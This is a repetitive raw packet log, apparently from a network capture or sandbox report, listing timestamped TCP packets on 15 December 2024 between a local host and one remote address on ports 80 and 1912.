                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.712330103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.712443113 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.713449001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.713483095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.713633060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.714526892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.714579105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.714714050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.715614080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.747831106 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.755024910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.801904917 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.846577883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.846600056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.846729994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.847033024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.847358942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.847455025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.848216057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.848716974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.848882914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.849492073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.849504948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.849611044 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.850594997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.850609064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.850703955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.851749897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.851762056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.851861000 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.852824926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.852977037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.853069067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.854063034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.854074001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.854197979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.855252028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.855273962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.855377913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.856404066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.856415033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.856512070 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.857537985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.857548952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.857647896 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.858752012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.858830929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.858928919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.859896898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.859909058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.859998941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.860960960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.860970974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.861073971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.862214088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.862226009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.862320900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.863300085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.863359928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.863454103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.864474058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.864552021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.864649057 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.865592003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.865783930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.865878105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.866733074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.866930008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.867022038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.867958069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.868005991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.868102074 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.869146109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.869189024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.869286060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.870316982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.870327950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.870424986 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.871490002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.871503115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.871602058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.872562885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.872809887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.872905970 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.873933077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.873944998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.874039888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.874886036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.874954939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.875051975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.876069069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.876416922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.876509905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.877187014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.877441883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.877559900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.878361940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.878452063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.878551006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.879565001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.879621029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.879715919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.880698919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.880789995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.880892992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.881871939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.881973028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.882061005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.883058071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.883153915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.883236885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.884238958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.884248972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.884335995 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.885363102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.885411978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.885499954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.886456013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.886605978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.886694908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.887645960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.887782097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.887871027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.888741970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.888915062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.889003038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.890043020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.890053034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.890142918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.891097069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.891268015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.891421080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.892278910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.892422915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.892509937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.893455982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.893570900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.893657923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.894669056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.894766092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.894980907 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.895811081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.895847082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.895936012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.896956921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.897034883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.897221088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.898099899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.898456097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.898540974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.899354935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.899370909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.899454117 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.900412083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.900626898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.900716066 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.901645899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.901657104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.901741982 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.902791023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.902806997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.902893066 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.903917074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.904031038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.904202938 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.905153990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.905169010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.905251026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.906343937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.906353951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.906457901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.907346964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.958134890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.038603067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.038619995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.038743973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.038978100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.039091110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.040193081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.040261030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.040327072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.040365934 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.041359901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.041646004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.041696072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.042557955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.042673111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.043680906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.043731928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.043807983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.043848038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.044915915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.045015097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.045069933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.045978069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.046274900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.047231913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.047333956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.047363043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.047408104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.048397064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.048485994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.048600912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.049546003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.049592018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.049690962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.050714970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.050726891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.050827026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.051758051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.051922083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.052078962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.053000927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.053044081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.053138971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.054081917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.054209948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.054311991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.055267096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.055412054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.055501938 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.056425095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.056529999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.056622028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.057600021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.057712078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.057806015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.058840036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.058943987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.059036970 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.059998035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.060169935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.060260057 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.061098099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.061300039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.061391115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.062342882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.062354088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.062514067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.063380003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.063492060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.063584089 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.064579010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.064738035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.064829111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.065711975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.065815926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.065911055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.066910982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.066962957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.067054987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.068058968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.068269968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.068392038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.069272041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.069315910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.069441080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.070373058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.070890903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.070996046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.071614027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.071647882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.071749926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.072705984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.073596954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.073694944 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.073987007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.073998928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.074095011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.075273991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.075285912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.075388908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.076288939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.076302052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.076399088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.077451944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.077465057 CET8049708185.81.68.147192.168.2.5
